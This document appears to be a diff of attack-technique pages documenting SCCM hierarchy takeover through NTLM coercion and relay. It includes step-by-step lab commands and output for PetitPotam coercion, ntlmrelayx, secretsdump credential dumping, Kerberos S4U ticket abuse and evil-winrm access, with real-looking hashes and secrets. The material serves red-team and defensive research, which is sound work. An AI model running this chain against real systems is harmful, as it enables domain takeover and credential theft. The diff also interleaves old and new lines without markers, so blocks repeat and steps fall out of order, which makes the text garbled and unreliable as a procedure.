16777220 b'0105000000000005150000005407a9ee65b1f9b01fff385e59040000' LAB\lowpriv lowpriv 0 0 LAB\administrator 2024-02-29 21:50:54 LAB\administrator 2024-02-29 21:50:54 LAB 128
SQL (LAB\sccm$ dbo@CM_LAB)>
```
The steps to execute TAKEOVER-3.1 and TAKEOVER-3.2 are mostly the same except that a different system is targeted for coercion of NTLM authentication.
## References
Author, Title, URL
exploit.ph, Revisiting Delegate 2 thyself,
Author, Title, URL
@@ -8,6 +8,7 @@ Hierarchy takeover via NTLM coercion and relay from CAS to origin primary site s
- [TA0008](https://attack.mitre.org/tactics/TA0008) - Lateral Movement
## Requirements
### Coercion
- Valid Active Directory domain credentials
- Connectivity to SMB (TCP/445) on coercion target:
@@ -22,262 +23,250 @@ Hierarchy takeover via NTLM coercion and relay from CAS to origin primary site s
### Relay
- Connectivity from the relay server to SMB (TCP/445) on the relay target, the child primary site
OR
- Connectivity from the relay server to HTTPS (TCP/443) on the relay target, the child primary site
AND
- Relay target settings:
- `RequireSecuritySignature` = `0` or not present
- `RestrictReceivingNTLMTraffic` = `0` or not present
- Coercion target is local admin (to access RPC/admin shares)
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
## Summary
In some situations, such as reaching limits for [client enrollment](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/configs/size-and-scale-numbers#bkmk_pri), SCCM adminsitrators may choose to expand from single site into a hierarchy mangaed by a Central Administration Site (CAS). A prerequisite for expansion is for the CAS's host server machine account to be a [local administrator](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/install/prerequisites-for-installing-sites#computer-account-as-administrator) on the originating primary site server. This permission is only required during expansion of the site and can be removed when complete. Additionally, this permission is not required for any further sites joined to the hierarchy once complete. However, if a configuration exists where all site server hosts are a member of a security group that grants local administrator rights to each other, the CAS can be coerced and relayed to *any* child site.
In some situations, such as reaching limits for [client enrollment](https://learn.microsoft.com/en-us/mem/configmgr/core/plan-design/configs/size-and-scale-numbers#bkmk_pri), SCCM adminsitrators may choose to expand from single site into a hierarchy managed by a central administration site (CAS). A prerequisite for expansion is for the CAS's domain computer account to be a [local administrator](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/install/prerequisites-for-installing-sites#computer-account-as-administrator) on the originating primary site server. This permission is only required during expansion of the site and can be removed when complete. Additionally, this permission is not required for any further sites joined to the hierarchy once complete. However, if a configuration exists where all site server hosts are a member of a security group that grants local administrator rights to each other, the CAS can be coerced and relayed to *any* child site.
An attacker who is able to successfully coerce NTLM authentication from a CAS via SMB can escalate to "Full Administrator" by either:
1. Relaying the CAS to SMB on its originating child primary site
2. Relaying the CAS to the AdminService on its originating child primary site
## Impact
The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
## Defensive IDs
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [DETECT-5: Monitor group membership changes for SMS Admins](../../../defense-techniques/DETECT/DETECT-5/detect-5_description.md)
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-4.1: Relay to SMB
- TAKEOVER-4.2: Relay to AdminService
## Defensive IDs
- [PREVENT-12: Require SMB signing on site systems](../../../defense-techniques/PREVENT/PREVENT-2/prevent-2_description.md)
- [DETECT-1: Monitor site system computer accounts authenticating from a source that is not its static IP](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [DETECT-4: Monitor group membership changes for SMS Admins](../../../defense-techniques/DETECT/DETECT-4/detect-4_description.md)
## Examples
### SMB relay
1. Use `SCCMHunter` to profile SCCM infrastructure
The results of the `smb` module indicate:
- The *CAS.INTERNAL.LAB* sytems is a site server in the "CAS" site and is also a Central Administration Site
- The *SCCM2.INTERNAL.LAB* host is a site server in the "ABC" site
- SMB signing is disabled on both systems
The results of the `smb` module indicate:
- The *CAS.INTERNAL.LAB* sytems is a site server in the "CAS" site and is also a central administration site
- The *SCCM2.INTERNAL.LAB* host is a site server in the "ABC" site
- SMB signing is disabled on both systems
```
└─# python3 sccmhunter.py smb -u 'lowpriv' -p '<password>' -d <domain.name> -dc-ip 10.10.100.100
SCCMHunter v1.0.0 by @garrfoster
[16:23:53] INFO Profiling 2 site servers.
[16:23:53] INFO [+] Finished profiling Site Servers.
[16:23:53] INFO +----------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
| Hostname | SiteCode | CAS | SigningStatus | SiteServer | SMSProvider | Config | MSSQL |
+======================+============+=======+=================+==============+===============+==========+=========+
| cas.internal.lab | CAS | True | False | True | True | Active | True |
+----------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
| sccm2.internal.lab | ABC | False | False | True | True | Active | True |
+----------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
```
```
└─# python3 sccmhunter.py smb -u 'lowpriv' -p '<password>' -d <domain.name> -dc-ip 10.10.100.100
SCCMHunter v1.0.0 by @garrfoster
[16:23:53] INFO Profiling 2 site servers.
[16:23:53] INFO [+] Finished profiling Site Servers.
[16:23:53] INFO +----------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
| Hostname | SiteCode | CAS | SigningStatus | SiteServer | SMSProvider | Config | MSSQL |
+======================+============+=======+=================+==============+===============+==========+=========+
| cas.internal.lab | CAS | True | False | True | True | Active | True |
+----------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
| sccm2.internal.lab | ABC | False | False | True | True | Active | True |
+----------------------+------------+-------+-----------------+--------------+---------------+----------+---------+
```
2. On the attacker relay server, start `ntlmrelayx`, targeting the SMB service on the primary site server identified in the previous step. The `-socks` flag is used to hold the authenticated session open
2. On the attacker relay server, start `ntlmrelayx`, targeting the SMB service on the primary site server identified in the previous step. The `-socks` flag is used to hold the authenticated session open:
```
└─# python3 ntlmrelayx.py -t smb://TARGET_SITE_SERVER -smb2support -socks
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
```
└─# python3 ntlmrelayx.py -t smb://TARGET_SITE_SERVER -smb2support -socks
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
```
[*] Servers started, waiting for connections
```
3. From the attacker host, coerce NTLM authentication from the CAS via SMB, targeting the relay server's IP address:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <CAS_SITE_SERVER_IP>
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <CAS_SITE_SERVER_IP>
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the site server and the authenticated session is held open:
```
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.23, attacking target smb://10.10.100.22
[*] Authenticating against smb://10.10.100.22 as LAB/CAS$ SUCCEED
[*] SOCKS: Adding LAB/CAS$@10.10.100.22(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.23 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ------------ -------- ----------- ----
SMB 10.10.100.22 LAB/CAS$ TRUE 445
ntlmrelayx>
```
```
4. Proxy `secretsdump.py` in the context of the CAS through the authenticated session to recover the primary site server's hashed credential:
```
└─# proxychains secretsdump.py 'lab/cas$@10.10.100.22' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the site server and the authenticated session is held open
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.22:445 ... OK
[*] Target system bootKey: 0x591d0e9f4a35be400e905f0a738f3293
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:c566fb8d8483e6965f3b84bfce924e68:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-04 02:22:11)
INTERNAL.LAB/sqlsvc:$DCC2$10240#sqlsvc#e12866f9a8777ddbe39ae1380ac6346c: (2024-02-03 07:49:42)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-04 03:52:56)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-04 04:07:52)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-03-05 21:42:14)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
LAB\SCCM2$:aes256-cts-hmac-sha1-96:c9d883ed8440db8e0d93f304515d30a1ff6e888bad955852de479c0315717244
LAB\SCCM2$:aes128-cts-hmac-sha1-96:aabcd69243a242d257672af66c042866
LAB\SCCM2$:des-cbc-md5:d65d37231697ea34
LAB\SCCM2$:plain_password_hex:0ccdb44e2241dea6ba1082fa4633eec08d86b943e9f7e6fed95165da6f3c3e9ed4d1b89b498a680fb90470bae441e68e72ae3b0b38b434f9516765d369a7d0d720307bf92d7c578655663f8aa9dc9a21168cbf51f5220b7962ce1f472b764a4e998b68f7af8cfa4206cf8b6367da9738ff0387d149febc6be6a3b98b4a9065011770a479e114dd9cd31da1ec47bb3299afb51b00b7cf40d2c98b415cd86b914cdb5cde6b5a38ee42ad395f53bd3c1cb98d246199d3513ad3003e3117fef88d3c7dd177e0af4d3ff89621f5e4ec36c84b18ee2a8d12aa2372622cd7b0e726adf273ab167b29a432b5100da5f7beeafbdc
LAB\SCCM2$:aad3b435b51404eeaad3b435b51404ee:2e510487c6db715d8f0c5bea67d9e27d:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7848d7d7769ac8bc4079e9958d33f241f5b3a745
dpapi_userkey:0x23789fd52652665f635839e916568e8d5fd2796b
[*] NL$KM
0000 9D DD 9E 8D BC 07 08 85 00 B7 A8 EB 0E A0 5C E2 ..............\.
0010 76 73 18 C4 74 EC BB 59 37 B1 95 56 2E 1B 33 85 vs..t..Y7..V..3.
0020 13 26 52 8B D9 28 48 47 78 2A C3 97 71 2B E5 A6 .&R..(HGx*..q+..
0030 CE 6E F9 90 1F 04 2A 2A DC 8F 73 E4 1D 30 97 72 .n....**..s..0.r
NL$KM:9ddd9e8dbc07088500b7a8eb0ea05ce2767318c474ecbb5937b195562e1b33851326528bd9284847782ac397712be5a6ce6ef9901f042a2adc8f73e41d309772
[*] Cleaning up...
```
```
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.23, attacking target smb://10.10.100.22
[*] Authenticating against smb://10.10.100.22 as LAB/CAS$ SUCCEED
[*] SOCKS: Adding LAB/CAS$@10.10.100.22(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.23 controlled, but there are no more targets left!
socks
Protocol Target Username AdminStatus Port
-------- ------------ -------- ----------- ----
SMB 10.10.100.22 LAB/CAS$ TRUE 445
ntlmrelayx>
```
5. Get TGT for recovered site server machine account:
```
└─# getTGT.py internal.lab/SCCM2$ -hashes aad3b435b51404eeaad3b435b51404ee:2e510487c6db715d8f0c5bea67d9e27d
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
4. Proxy `secretsdump.py` in the context of the CAS through the authenticated session to recover the primary site server's hashed credential
[*] Saving ticket in SCCM2$.ccache
```
```
└─# proxychains secretsdump.py 'lab/cas$@10.10.100.22' -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
6. S4U:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PKINITtools]
└─# python3 gets4uticket.py kerberos+ccache://internal.lab\\sccm\$:SCCM2\$.ccache@dc01.internal.lab http/sccm2.internal.lab@internal.lab cas\$@internal.lab cas_s4u.ccache -v
2024-03-06 21:59:36,769 minikerberos INFO Trying to get SPN with cas$@internal.lab for http/sccm2.internal.lab@internal.lab
INFO:minikerberos:Trying to get SPN with cas$@internal.lab for http/sccm2.internal.lab@internal.lab
2024-03-06 21:59:36,774 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-03-06 21:59:36,774 minikerberos INFO Done!
INFO:minikerberos:Done!
```
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.22:445 ... OK
[*] Target system bootKey: 0x591d0e9f4a35be400e905f0a738f3293
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:c566fb8d8483e6965f3b84bfce924e68:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-04 02:22:11)
INTERNAL.LAB/sqlsvc:$DCC2$10240#sqlsvc#e12866f9a8777ddbe39ae1380ac6346c: (2024-02-03 07:49:42)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-04 03:52:56)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-02-04 04:07:52)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42: (2024-03-05 21:42:14)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
LAB\SCCM2$:aes256-cts-hmac-sha1-96:c9d883ed8440db8e0d93f304515d30a1ff6e888bad955852de479c0315717244
LAB\SCCM2$:aes128-cts-hmac-sha1-96:aabcd69243a242d257672af66c042866
LAB\SCCM2$:des-cbc-md5:d65d37231697ea34
LAB\SCCM2$:plain_password_hex:0ccdb44e2241dea6ba1082fa4633eec08d86b943e9f7e6fed95165da6f3c3e9ed4d1b89b498a680fb90470bae441e68e72ae3b0b38b434f9516765d369a7d0d720307bf92d7c578655663f8aa9dc9a21168cbf51f5220b7962ce1f472b764a4e998b68f7af8cfa4206cf8b6367da9738ff0387d149febc6be6a3b98b4a9065011770a479e114dd9cd31da1ec47bb3299afb51b00b7cf40d2c98b415cd86b914cdb5cde6b5a38ee42ad395f53bd3c1cb98d246199d3513ad3003e3117fef88d3c7dd177e0af4d3ff89621f5e4ec36c84b18ee2a8d12aa2372622cd7b0e726adf273ab167b29a432b5100da5f7beeafbdc
LAB\SCCM2$:aad3b435b51404eeaad3b435b51404ee:2e510487c6db715d8f0c5bea67d9e27d:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7848d7d7769ac8bc4079e9958d33f241f5b3a745
dpapi_userkey:0x23789fd52652665f635839e916568e8d5fd2796b
[*] NL$KM
0000 9D DD 9E 8D BC 07 08 85 00 B7 A8 EB 0E A0 5C E2 ..............\.
0010 76 73 18 C4 74 EC BB 59 37 B1 95 56 2E 1B 33 85 vs..t..Y7..V..3.
0020 13 26 52 8B D9 28 48 47 78 2A C3 97 71 2B E5 A6 .&R..(HGx*..q+..
0030 CE 6E F9 90 1F 04 2A 2A DC 8F 73 E4 1D 30 97 72 .n....**..s..0.r
NL$KM:9ddd9e8dbc07088500b7a8eb0ea05ce2767318c474ecbb5937b195562e1b33851326528bd9284847782ac397712be5a6ce6ef9901f042a2adc8f73e41d309772
[*] Cleaning up...
```
7. Set the Kerberos credentials cache file environment variable:
```
export cas_s4u.ccache
5. Get TGT for recovered site server machine account
└─# klist
Ticket cache: FILE:cas_s4u.ccache
Default principal: SCCM2$@INTERNAL.LAB
```
└─# getTGT.py internal.lab/SCCM2$ -hashes aad3b435b51404eeaad3b435b51404ee:2e510487c6db715d8f0c5bea67d9e27d
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
Valid starting Expires Service principal
03/06/2024 18:02:50 03/07/2024 04:02:50 krbtgt/INTERNAL.LAB@INTERNAL.LAB
renew until 03/07/2024 18:02:50
03/06/2024 21:59:36 03/07/2024 04:02:50 http/sccm2.internal.lab@INTERNAL.LAB
for client cas$@internal.lab
03/06/2024 21:59:36 03/07/2024 04:02:50 http/sccm2.internal.lab@INTERNAL.LAB
for client cas$@internal.lab
```
[*] Saving ticket in SCCM2$.ccache
```
8. Establish a PowerShell remoting session on the target site server to interact with the SMS Provider:
```
└─# evil-winrm -r internal.lab -i sccm2.internal.lab
6. S4U
Evil-WinRM shell v3.5
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PKINITtools]
└─# python3 gets4uticket.py kerberos+ccache://internal.lab\\sccm\$:SCCM2\$.ccache@dc01.internal.lab http/sccm2.internal.lab@internal.lab cas\$@internal.lab cas_s4u.ccache -v
2024-03-06 21:59:36,769 minikerberos INFO Trying to get SPN with cas$@internal.lab for http/sccm2.internal.lab@internal.lab
INFO:minikerberos:Trying to get SPN with cas$@internal.lab for http/sccm2.internal.lab@internal.lab
2024-03-06 21:59:36,774 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-03-06 21:59:36,774 minikerberos INFO Done!
INFO:minikerberos:Done!
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
```
7. Set the Kerberos credentials cache file environment variable
```
export cas_s4u.ccache
└─# klist
Ticket cache: FILE:cas_s4u.ccache
Default principal: SCCM2$@INTERNAL.LAB
Valid starting Expires Service principal
03/06/2024 18:02:50 03/07/2024 04:02:50 krbtgt/INTERNAL.LAB@INTERNAL.LAB
renew until 03/07/2024 18:02:50
03/06/2024 21:59:36 03/07/2024 04:02:50 http/sccm2.internal.lab@INTERNAL.LAB
for client cas$@internal.lab
03/06/2024 21:59:36 03/07/2024 04:02:50 http/sccm2.internal.lab@INTERNAL.LAB
for client cas$@internal.lab
```
8. Establish a PowerShell remoting session on the target site server to interact with the SMS Provider
```
└─# evil-winrm -r internal.lab -i sccm2.internal.lab
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\SCCM2$\Documents> get-ciminstance -ClassName SMS_Admin -Namespace root\sms\site_ABC
AccountType : 0
AdminID : 16777217
AdminSid : S-1-5-21-4004054868-2969153893-1580793631-500
Categories :
CategoryNames : {All}
CollectionNames : {All Systems, All Users and User Groups}
CreatedBy : LAB\Administrator
CreatedDate : 2/2/2024 11:56:51 PM
DisplayName :
DistinguishedName :
ExtendedData :
IsCovered :
IsDeleted : False
IsGroup : False
LastModifiedBy : LAB\Administrator
LastModifiedDate : 2/2/2024 11:56:51 PM
LogonName : LAB\Administrator
Permissions :
RoleNames : {Full Administrator}
Roles :
SKey : ABCS-1-5-21-4004054868-2969153893-1580793631-500
SourceSite : ABC
PSComputerName :
```
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\SCCM2$\Documents> get-ciminstance -ClassName SMS_Admin -Namespace root\sms\site_ABC
AccountType : 0
AdminID : 16777217
AdminSid : S-1-5-21-4004054868-2969153893-1580793631-500
Categories :
CategoryNames : {All}
CollectionNames : {All Systems, All Users and User Groups}
CreatedBy : LAB\Administrator
CreatedDate : 2/2/2024 11:56:51 PM
DisplayName :
DistinguishedName :
ExtendedData :
IsCovered :
IsDeleted : False
IsGroup : False
LastModifiedBy : LAB\Administrator
LastModifiedDate : 2/2/2024 11:56:51 PM
LogonName : LAB\Administrator
Permissions :
RoleNames : {Full Administrator}
Roles :
SKey : ABCS-1-5-21-4004054868-2969153893-1580793631-500
SourceSite : ABC
PSComputerName :
```
## References
Microsoft, Prerequisites for installing Configuration Manager sites, https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/install/prerequisites-for-installing-sites#bkmk_expand
- Microsoft, [Prerequisites for installing Configuration Manager sites](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/install/prerequisites-for-installing-sites#bkmk_expand)
- Garrett Foster, [SCCMHunter](https://github.com/garrettfoster13/sccmhunter)
@@ -1,6 +1,7 @@
# TAKEOVER-5
## Description
Hierarchy Takeover via NTLM Coercion and Relay from Site Server to AdminService
Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider
## MITRE ATT&CK TTPs
- [TA0008](https://attack.mitre.org/tactics/TA0008) - Lateral Movement
@@ -11,15 +12,12 @@ Hierarchy Takeover via NTLM Coercion and Relay from Site Server to AdminService
### Coercion
- Valid Active Directory domain credentials
- Connectivity to SMB (TCP/445) on a coercion target:
- TAKEOVER-5.1: Primary site server
- TAKEOVER-5.2: Passive site server
- TAKEOVER-5.3: CAS site server
- TAKEOVER-5.1: Coerce primary site server
- TAKEOVER-5.2: Coerce passive site server
- Connectivity from the coercion target to SMB (TCP/445) on the relay server
- Coercion target settings:
- `BlockNTLM` = `0` or not present, or = `1` and `BlockNTLMServerExceptionList` contains attacker relay server
- `RestrictSendingNTLMTraffic` = `0`, `1`, or not present, or = `2` and `ClientAllowedNTLMServers` contains attacker relay server
- Domain computer account is not in `Protected Users`
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains coercion target
- `LmCompatibilityLevel` < `5` or not present, or = `5` and LmCompatibilityLevel >= `3` on the coercion target
@@ -27,108 +25,94 @@ Hierarchy Takeover via NTLM Coercion and Relay from Site Server to AdminService
### Relay
- Connectivity from the relay server to HTTPS (TCP/443) on the relay target hosting the SMS Provider role
## Summary
The SMS Provider is a SCCM site server role installed by default on the site server when configuring a primary site or central administration site. The role can optionally be installed on additional SCCM site systems for high availability configurations. The SMS Provider is a Windows Management Instrumentation (WMI) provider that performs as an intermediary for accessing and modifying data stored in the site database. Access to the SMS Provider is controlled via membership of the the `SMS Admins` local security group on each site server. The site server computer account is a member of the `SMS Admins` security group on each SMS Provider in a site by default.
The SMS Provider is a SCCM site server role installed by default on the site server when configuring a primary site or central administration site. The role can optionally be installed on additional SCCM site systems for high availability configurations. The SMS Provider is a Windows Management Instrumentation (WMI) provider that performs as an intermediary for accessing and modifying data stored in the site database. Access to the SMS Provider is controlled via membership of the the `SMS Admins` local security group on each site server. The site server computer account is a member of the `SMS Admins` security group on each SMS Provider in a site by default.
The SMS Provider also provides access to the site database via the administration service (adminservice) REST API and uses Microsoft Negotiate for authentication. In default configurations, the adminservice is vulnerable to NTLM relay attacks.
The SMS Provider also provides access to the site database via the administration service (AdminService) REST API and uses Microsoft Negotiate for authentication. In default configurations, the AdminService is vulnerable to NTLM relay attacks.
## Impact
This technique may allow an attacker to relay a site server machine account to a remote SMS Provider and elevate their privileges to "Full Administrator" for the SCCM Hierarchy. If successful, this technique enables an attacker to execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on.
This technique may allow an attacker to relay a site server's domain computer account to a remote SMS Provider and elevate their privileges to "Full Administrator" for the SCCM hierarchy. If successful, this technique enables an attacker to execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on.
## Defensive IDs
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [DETECT-5: Monitor group membership changes for SMS Admins](../../../defense-techniques/DETECT/DETECT-5/detect-5_description.md)
- [PREVENT-9: Enforce MFA for SMS Provider calls](../../../defense-techniques/PREVENT/PREVENT-9/prevent-9_description.md)
- [DETECT-4: Monitor SMS Admins group membership](../../../defense-techniques/DETECT/DETECT-4/detect-4_description.md)
- [PREVENT-14: Require EPA on AD CS and site databases](../../../defense-techniques/PREVENT/PREVENT-14/prevent-14_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-5.1: NTLM relay primary site server SMB to AdminService on remote SMS Provider
- TAKEOVER-5.2: NTLM relay passive site server SMB to AdminService on remote SMS Provider
- TAKEOVER-5.3: NTLM relay CAS site server SMB to AdminService on remote SMS Provider
- TAKEOVER-5.1: Coerce primary site server
- TAKEOVER-5.2: Coerce passive site server
## Examples
1. Use `SCCMHunter` to profile SCCM infrastructure.
1. Use `SCCMHunter` to profile SCCM infrastructure:
```
[02:00:25 PM] INFO [+] Finished profiling all discovered computers.
[02:00:25 PM] INFO +-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | ManagementPoint | DistributionPoint | SMSProvider | WSUS | MSSQL |
+=========================+============+=================+==============+===================+=====================+===============+========+=========+
| provider.internal.lab | None | False | False | False | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
| sccm.internal.lab | LAB | False | True | True | False | True | False | False |
+-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
```
```
[02:00:25 PM] INFO [+] Finished profiling all discovered computers.
[02:00:25 PM] INFO +-------------------------+------------+-----------------+--------------+-------------------+---------------------+---------------+--------+---------+
